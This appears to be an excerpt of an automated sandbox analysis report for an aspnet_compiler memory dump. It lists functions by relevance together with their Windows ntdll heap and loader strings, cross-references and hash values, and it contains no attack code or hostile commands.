String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: cae39761ab5d5305d4674e0fa0f884cfbcca5375e8e613fa0a596e07d869a573
Instruction ID: 2649d394ef14845cf6e15f4d8643037b10bcae98415b2ad400ec16ab0496cbea
Opcode Fuzzy Hash: cae39761ab5d5305d4674e0fa0f884cfbcca5375e8e613fa0a596e07d869a573
Instruction Fuzzy Hash: FA912471B017229BEB29EF59DC88BAE7BE2BF51B54F54402CD9016F381DB60A801CF95

Function 0165F525 Relevance: 7.7, Strings: 6, Instructions: 231COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 0165F6F4, 0165F7A1, 0165F7F8
Just allocated block at %p for 0x%Ix bytes with tag %ws, xrefs: 0165F7BE
Just allocated block at %p for %Ix bytes, xrefs: 0165F708
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 0165F809
RtlAllocateHeap, xrefs: 0165F56D
HEAP[%wZ]: , xrefs: 0165F6E7, 0165F794, 0165F7EB

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
API String ID: 0-1745908468
Opcode ID: 2f6fb1f8439ed2ec73093f7020f04ce2cdc571f05b2a6630c143896839bfb2d8
Instruction ID: facefc82c7bc5198eec446c85c98955ca293bc0d0ecd7f16ff61e261f13fef16
Opcode Fuzzy Hash: 2f6fb1f8439ed2ec73093f7020f04ce2cdc571f05b2a6630c143896839bfb2d8
Instruction Fuzzy Hash: 86910031A00656DFDB52DF68CC40AADBBF2FF59704F58809DE846AB361CB71A841CB54

Function 015A645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON

Download Yara Rule

Strings

Getting the shim engine exports failed with status 0x%08lx, xrefs: 01609A01
Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 016099ED
LdrpInitShimEngine, xrefs: 016099F4, 01609A07, 01609A30
minkernel\ntdll\ldrinit.c, xrefs: 01609A11, 01609A3A
Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01609A2A
apphelp.dll, xrefs: 015A6496

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-204845295
Opcode ID: 69b7b3931449557066300c711eb3948c3c8b5d810316871a8377c05c32da041b
Instruction ID: 4ba773aa8181ce399158e37520080047e8437190e44714cbe6a395d9e2eec378
Opcode Fuzzy Hash: 69b7b3931449557066300c711eb3948c3c8b5d810316871a8377c05c32da041b
Instruction Fuzzy Hash: 6651C0712483059FD725DF24CC41BABBBE9FB84748F84091DF9899B2A1D770E944CB92

Function 015DF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 016202E7
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 016202BD
RTL: Re-Waiting, xrefs: 0162031E

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 4ecb7074cc44e09bb52d00f67d2e4dc7683743cb3175cf43efd694234f4fe2ed
Instruction ID: 234d3eeec08242cc3e63da33c1c1ba1ea52ba8100b2278546b99e750bfe29d6a
Opcode Fuzzy Hash: 4ecb7074cc44e09bb52d00f67d2e4dc7683743cb3175cf43efd694234f4fe2ed
Instruction Fuzzy Hash: DEE19C70608B429FD725CF2CC884B6ABBE0BB85314F144A5EF5A6CB2E1D774D846CB42

Function 015D51EF Relevance: 6.7, Strings: 5, Instructions: 434COMMON

Download Yara Rule

Strings

Kernel-MUI-Language-Disallowed, xrefs: 015D5352
Kernel-MUI-Number-Allowed, xrefs: 015D5247
Kernel-MUI-Language-SKU, xrefs: 015D542B
Kernel-MUI-Language-Allowed, xrefs: 015D527B
WindowsExcludedProcs, xrefs: 015D522A

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: cfc785a30997c817fb7a2fc466da6404903b772fe0a6957f710806642e5574c6
Instruction ID: 279ccbfc21008e19d0699d6eee2a3713bb12974859cb518ae0afeb81d2548c5b
Opcode Fuzzy Hash: cfc785a30997c817fb7a2fc466da6404903b772fe0a6957f710806642e5574c6
Instruction Fuzzy Hash: DEF13076D2021AEFCB22DF99C9409EEBBF9FF58650F55446AE501EB210E7709E01CB90

Function 015C70C0 Relevance: 6.0, Strings: 3, Instructions: 2248COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 015C7C7C, 015C867F
HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 015C7C96, 015C8696
HEAP[%wZ]: , xrefs: 015C7C6D, 015C8670

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: 17bb81c4943b64678a7943b51138d06365d9d620b109b665edc738b5c283a31c
Instruction ID: eed046aaf8f97de8d3ec43e2adbbf3c49ed33e42b8d576a3eaffef0cfc673277
Opcode Fuzzy Hash: 17bb81c4943b64678a7943b51138d06365d9d620b109b665edc738b5c283a31c
Instruction Fuzzy Hash: 02139B70A006568FDB25CFA8C8807ADBBF2BF48B04F1485ADD949AF781D774A945CF90

Function 015C1070 Relevance: 5.9, Strings: 4, Instructions: 940COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 01615884
@, xrefs: 01615A53
!(CheckedFlags & ~HEAP_CREATE_VALID_MASK), xrefs: 0161588F
HEAP[%wZ]: , xrefs: 01615877

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
API String ID: 0-3570731704
Opcode ID: 38970113e8ab23490635f1ae8d460e0b5cbc2f98fc9cc5571914c1f7dd943af3
Instruction ID: 7d5c052208e73921e2d961b6a920d3621f7460d3437c97e9212734ca04f82bb8
Opcode Fuzzy Hash: 38970113e8ab23490635f1ae8d460e0b5cbc2f98fc9cc5571914c1f7dd943af3
Instruction Fuzzy Hash: 37926C71A00629CFEB25CF58CC80BA9B7B6BF85710F0585E9D94AAB352D7709E80CF51

Function 015B1460 Relevance: 5.4, Strings: 4, Instructions: 385COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 015B1596
HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 015B1728
, xrefs: 015B16A3
HEAP[%wZ]: , xrefs: 015B1712

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: $HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-2084224854
Opcode ID: 158199b945ab2eac394261ca546996508f96ef66b9f759d364e5fe2b1d61a702
Instruction ID: 3c82aa4b955e3d7365cac817f671ab20a7ea00555256f5abc5f7be83a14e22e4
Opcode Fuzzy Hash: 158199b945ab2eac394261ca546996508f96ef66b9f759d364e5fe2b1d61a702
Instruction Fuzzy Hash: 15E1C230A04A459FDB69CF68D8E1ABABBF5BF44300F18885DE596CF286D734E941CB50

Function 015BA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

8, xrefs: 015BA3E7
LdrResFallbackLangList Enter, xrefs: 015BA3EF
6, xrefs: 015BA3F7
LdrResFallbackLangList Exit, xrefs: 015BA3FF

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: f49ce1918c5d9b9497d9cffbcfff449804435f849405f69b7eb083758b2e3ef4
Instruction ID: 6a7ed52ea4fa36bd5de95b59ea6036f826c93bf866e2abb80c5ac13306d68a48
Opcode Fuzzy Hash: f49ce1918c5d9b9497d9cffbcfff449804435f849405f69b7eb083758b2e3ef4
Instruction Fuzzy Hash: 8BC18A74508386CFD721CF58C480BAAB7E4BF84704F04496EF9958B395E778CA49CB52

Function 015E8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON

Download Yara Rule

Strings

@, xrefs: 015E8591
LdrpInitializeProcess, xrefs: 015E8422
\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 015E855E
minkernel\ntdll\ldrinit.c, xrefs: 015E8421

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
API String ID: 0-1918872054
Opcode ID: 25649242eb3befa6b551e7f03c233291d68fc3350ef1d96adc8202f1fb34bdde
Instruction ID: 321556afd26e62967af92316a34e88462f03a91e74c37d60adf82c9d90051a77
Opcode Fuzzy Hash: 25649242eb3befa6b551e7f03c233291d68fc3350ef1d96adc8202f1fb34bdde
Instruction Fuzzy Hash: D1919EB1908746AFD721DF65CC84EAFBAE8FF84744F40496EFA859A150E730D904CB62

Function 015D15F4 Relevance: 5.2, Strings: 4, Instructions: 166COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrmap.c, xrefs: 0161A59A
Could not validate the crypto signature for DLL %wZ, xrefs: 0161A589
MZER, xrefs: 015D16E8
LdrpCompleteMapModule, xrefs: 0161A590

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$MZER$minkernel\ntdll\ldrmap.c
API String ID: 0-1409021520
Opcode ID: 3f9ee88423cb27dbbdcf9c9f82a6d7de7f6c124705648db5a7519640bb6a2f49
Instruction ID: d3947dc558265d3bec8eb7e827366fb77f800340a5f60d34f499f47686b8601b
Opcode Fuzzy Hash: 3f9ee88423cb27dbbdcf9c9f82a6d7de7f6c124705648db5a7519640bb6a2f49
Instruction Fuzzy Hash: AC51E470605B869BEB32CBACCD84B6A7BE5BF40714F180568EA519FBD6D774E800C740

Function 016611A4 Relevance: 5.1, Strings: 4, Instructions: 113COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 0166124A, 0166125D, 0166125F, 016612C4
Heap %p - headers modified (%p is %lx instead of %lx), xrefs: 01661261
HEAP[%wZ]: , xrefs: 0166123D, 016612B7
This is located in the %s field of the heap header., xrefs: 016612D6

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
API String ID: 0-336120773
Opcode ID: 008538b1a568b2730ed6a00739cb2b943306243bc3c555c0e9498785ce0c62d8
Instruction ID: af2a0739e5687fb7b84c3ba7ede4f60fe318400220593a55c82060c3f91a0908
Opcode Fuzzy Hash: 008538b1a568b2730ed6a00739cb2b943306243bc3c555c0e9498785ce0c62d8
Instruction Fuzzy Hash: 0731DDB1200546EFD711DBA9CC85F6A77ECFB86620F148059F501DF2A0EB30A984CAA4

Function 015D245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0161A992
minkernel\ntdll\ldrinit.c, xrefs: 0161A9A2
LdrpDynamicShimModule, xrefs: 0161A998
apphelp.dll, xrefs: 015D2462

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: c79690ac9d7f67623c503bd592e58a7a8c6a5a7de585efa02b709b3031a8b9d6
Instruction ID: e324f9470406532cb611e498001656171255d40ccbee3c7000a65fea178a5742
Opcode Fuzzy Hash: c79690ac9d7f67623c503bd592e58a7a8c6a5a7de585efa02b709b3031a8b9d6
Instruction Fuzzy Hash: 61312872610242EBDB319F9DDC81AAEBBB5FB84B10F5A441DE9016F349C770A891CF90

Function 015A9148 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 0160BAAD, 0160BAEA
HEAP[%wZ]: , xrefs: 0160BAA0, 0160BADD
VirtualQuery Failed 0x%p %x, xrefs: 0160BAF7
VirtualProtect Failed 0x%p %x, xrefs: 0160BABA

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
API String ID: 0-1391187441
Opcode ID: 90a8d34bd244eae675f98df9c9382f1ad2c0850422daa57f7d3480d80d800c11
Instruction ID: 39fd21d2d016e1772a6f9b3d8945b8858537e39916ab97c53f2fb9833bae0bab
Opcode Fuzzy Hash: 90a8d34bd244eae675f98df9c9382f1ad2c0850422daa57f7d3480d80d800c11
Instruction Fuzzy Hash: 1A31B43664011AEFCB02DB49CC85F9FBBB8FF85624F144059E915AF291D770ED80CA60

Function 015AA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

UseFilter, xrefs: 015AA1C1
FilterFullPath, xrefs: 0160C2E6
\??\, xrefs: 0160C1E4

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: ddd2a724b45f049bf3d20f6687a5feaac484e0ad4d775d54ea0cdb4a20046377
Instruction ID: edd8f599c83396be182ec56ebf2682aafd9d44ce6627ec6c35af8547836d3afe
Opcode Fuzzy Hash: ddd2a724b45f049bf3d20f6687a5feaac484e0ad4d775d54ea0cdb4a20046377
Instruction Fuzzy Hash: 0EA15F7191162A9BDB36DF68CC88BAEB7B8FF44700F1141E9E909AB250D7359E84CF50

Function 015BB440 Relevance: 4.0, Strings: 3, Instructions: 221COMMON

Download Yara Rule

Strings

LdrpResGetResourceDirectory Enter, xrefs: 015BB465
LdrpResGetResourceDirectory Exit, xrefs: 015BB477
{, xrefs: 016137B6

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
API String ID: 0-373624363
Opcode ID: 9443d803c3e9a14269f53da781a1343537b14054abbc1467f6bda0acbfea1725
Instruction ID: 1093a577960f36c2070bcee37798a47c9b0fd0da7ad37e9e06f1c55f83ce0aaf
Opcode Fuzzy Hash: 9443d803c3e9a14269f53da781a1343537b14054abbc1467f6bda0acbfea1725
Instruction Fuzzy Hash: CF918C71A05249CBEB21CF58C980BEEB7B1FF05324F184599E912AF390D7B89D80CB95

Function 015E909C Relevance: 3.9, Strings: 3, Instructions: 199COMMON

Download Yara Rule

Strings

@, xrefs: 015E9148
%, xrefs: 01625D3F
&, xrefs: 01625CF8

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: %$&$@
API String ID: 0-1537733988
Opcode ID: dd68c311321b418363f3a7a06cc1e0abae44a34403c9a6aeed0774d8dfe97184
Instruction ID: fc07878dc8600af0654e42f11dae506a256a005119c0b4ddc00b4db0c7acb720
Opcode Fuzzy Hash: dd68c311321b418363f3a7a06cc1e0abae44a34403c9a6aeed0774d8dfe97184
Instruction Fuzzy Hash: E271D470A087429FCB19DF14C988A6FBBEABFC4718F104A1DE4964B251D731D905CF96

Function 015A758F Relevance: 3.9, Strings: 3, Instructions: 132COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 0160AFB8
HEAP[%wZ]: , xrefs: 0160AFAB
Invalid address specified to %s( %p, %p ), xrefs: 0160AFCB

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
API String ID: 0-1151232445
Opcode ID: 02ab27fbd8a7d87f0c177cb5bfb1089b72875525b1363d6476eb5c71e3056719
Instruction ID: 1d17b86e0e300d36c53eff4e488bec7d9c8eea7d48b5eaf481613a020d2a7a5c
Opcode Fuzzy Hash: 02ab27fbd8a7d87f0c177cb5bfb1089b72875525b1363d6476eb5c71e3056719
Instruction Fuzzy Hash: D041F5703403808FEF2ACA9DC89477E7BE0BF05284F9844ADD5468F2D6DBA5D485CB51

Function 0166C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

@, xrefs: 0166C1F1
PreferredUILanguages, xrefs: 0166C212
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0166C1C5

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
API String ID: 0-2968386058
Opcode ID: 13011c648f4ca62be0a3122552abccc259448c49c6ec0355033248df604cb3ec
Instruction ID: 04290b00240a19114de0fce8e525fb540cad80e470e1416ac0b6636294a1a365
Opcode Fuzzy Hash: 13011c648f4ca62be0a3122552abccc259448c49c6ec0355033248df604cb3ec
Instruction Fuzzy Hash: 55416171E1060AEBDF11DAD8CC51FEEBBBCBB54704F14806AEA49B7240D7749A458B90

Function 01644144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

@, xrefs: 01644225
LdrpResValidateFilePath Exit, xrefs: 01644172
LdrpResValidateFilePath Enter, xrefs: 01644160

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
API String ID: 0-1373925480
Opcode ID: 609df1c0cc49ab3ccfed3cde4deb7fd118f8b3ee2e5336d93ac516ee4c6cddd8
Instruction ID: 4ba4b0a09f22c769f3ddb06ed9387e7bd4d052e54714f94478b52de22a35cb47
Opcode Fuzzy Hash: 609df1c0cc49ab3ccfed3cde4deb7fd118f8b3ee2e5336d93ac516ee4c6cddd8
Instruction Fuzzy Hash: C041FF71A00649CBEB26DBE9CC41BAEBBB8FF95340F14445AD901AF791DB359901CB11

Function 015E33A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON

Download Yara Rule

Strings

RtlCreateActivationContext, xrefs: 016229F9
Actx , xrefs: 015E33AC
SXS: %s() passed the empty activation context data, xrefs: 016229FE

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
API String ID: 0-859632880
Opcode ID: 8fb710d9ed2ec6127eb30dcb9d74626152a85ed4f28afe85bf6d30f32d529570
Instruction ID: f61236100d4ed2d18e7e1c29f8ce581279a165044f427f180e69f47cf16188d9
Opcode Fuzzy Hash: 8fb710d9ed2ec6127eb30dcb9d74626152a85ed4f28afe85bf6d30f32d529570
Instruction Fuzzy Hash: AE314632A003129FEB26DF59CC98B9A7BE4BB84710F04846DED049F641DB30E841CB90

Function 0163B594 Relevance: 3.9, Strings: 3, Instructions: 107COMMON

Download Yara Rule

Strings

@, xrefs: 0163B670
\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 0163B632
GlobalFlag, xrefs: 0163B68F

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
API String ID: 0-4192008846
Opcode ID: f2e0e73488def05c515c737352ea927e31340e26750009254bd3eaf091107ea3
Instruction ID: c7e2ea1b5a554122494b4e1802b589d9b019aae7aec239fcf74f0d08e1529a0e
Opcode Fuzzy Hash: f2e0e73488def05c515c737352ea927e31340e26750009254bd3eaf091107ea3
Instruction Fuzzy Hash: BE314FB1A0021AAFDB10EF95CC80AEEBB78FF85744F144469E605AB251D7749E00DBA4

Function 015F1270 Relevance: 3.8, Strings: 3, Instructions: 97COMMON

Download Yara Rule

Strings

@, xrefs: 015F12A5
BuildLabEx, xrefs: 015F130F
\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 015F127B

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 0-3051831665
Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
Instruction ID: cc3a22f5b26f1d9c754b90be0b415594e5f288456e2e9b031f1ded7e0472b2f6
Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
Instruction Fuzzy Hash: 3B3161B2A0051EEFDB119F95CD44EDEBFBDFB94754F004469EA14AB2A0E730DA058B60

Function 016320DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON

Download Yara Rule

Strings

LdrpInitializationFailure, xrefs: 016320FA
Process initialization failed with status 0x%08lx, xrefs: 016320F3
minkernel\ntdll\ldrinit.c, xrefs: 01632104

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 0-2986994758
Opcode ID: 5c2c4169a8d5a98565248cf6de284a0df85d51ee16aa3feee0dad859c6a84dac
Instruction ID: a50fe2ad224487472c71210f23cdf5e9962032389f2318e015f4bdf9c3974e40
Opcode Fuzzy Hash: 5c2c4169a8d5a98565248cf6de284a0df85d51ee16aa3feee0dad859c6a84dac
Instruction Fuzzy Hash: 2CF0C235640319BBEB24E64CCD52FAA7BA8FB80B54F50006DFB007F785D2B0B950CA95

Function 015C03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01614D8A

Strings

#%u, xrefs: 01614D82

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID: ___swprintf_l
String ID: #%u
API String ID: 48624451-232158463
Opcode ID: 59507a82331462aa4120cbaec19fa000cd55f4a1fc738d072ef762089897f564
Instruction ID: 984edb3d06bf4bfe218d75cf3b1ba58ba58bcd40a6aed75345923d363d71901e
Opcode Fuzzy Hash: 59507a82331462aa4120cbaec19fa000cd55f4a1fc738d072ef762089897f564
Instruction Fuzzy Hash: 74713972A0014A9FDB05DFA8C990BAEB7F8FF48744F144069E905EB251EB34AD01CBA4

Function 015C52A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON

Download Yara Rule

Strings

@, xrefs: 015C55A3
@, xrefs: 015C5445

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: @$@
API String ID: 0-149943524
Opcode ID: 8023b36f50128197ec1c25c0c141784fb6612b9a2b77c4790310950d72eecaa1
Instruction ID: a9152b71ab53d57171ccd7c70068406944db37b886614aef9e9aa037045876bb
Opcode Fuzzy Hash: 8023b36f50128197ec1c25c0c141784fb6612b9a2b77c4790310950d72eecaa1
Instruction Fuzzy Hash: C2327D746183128FD7248F99C88077EBBE1FF84B44F18491EFA859B290E774E984CB52

Function 0167A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

`, xrefs: 0167A44B
`, xrefs: 0167A551

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_1580000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction ID: bbeb9684ebe732bbf4e356c951da336f227b0ed088f8ed12b2439c90bd20e1b4
Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction Fuzzy Hash: 8AC1BD312043429BEB24CFA8CC45B6BBBE6AFC4718F084A2DF696CB290D775D545CB81

Function 015BA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Enter, xrefs: 015BA2FB
RtlpResUltimateFallbackInfo Exit, xrefs: 015BA309

Memory Dump Source

Source File: 00000010.00000002.1652512544.0000000001580000.00000040.00001000.00020000.00000000.sdmp, Offset: 01580000, based on PE: true

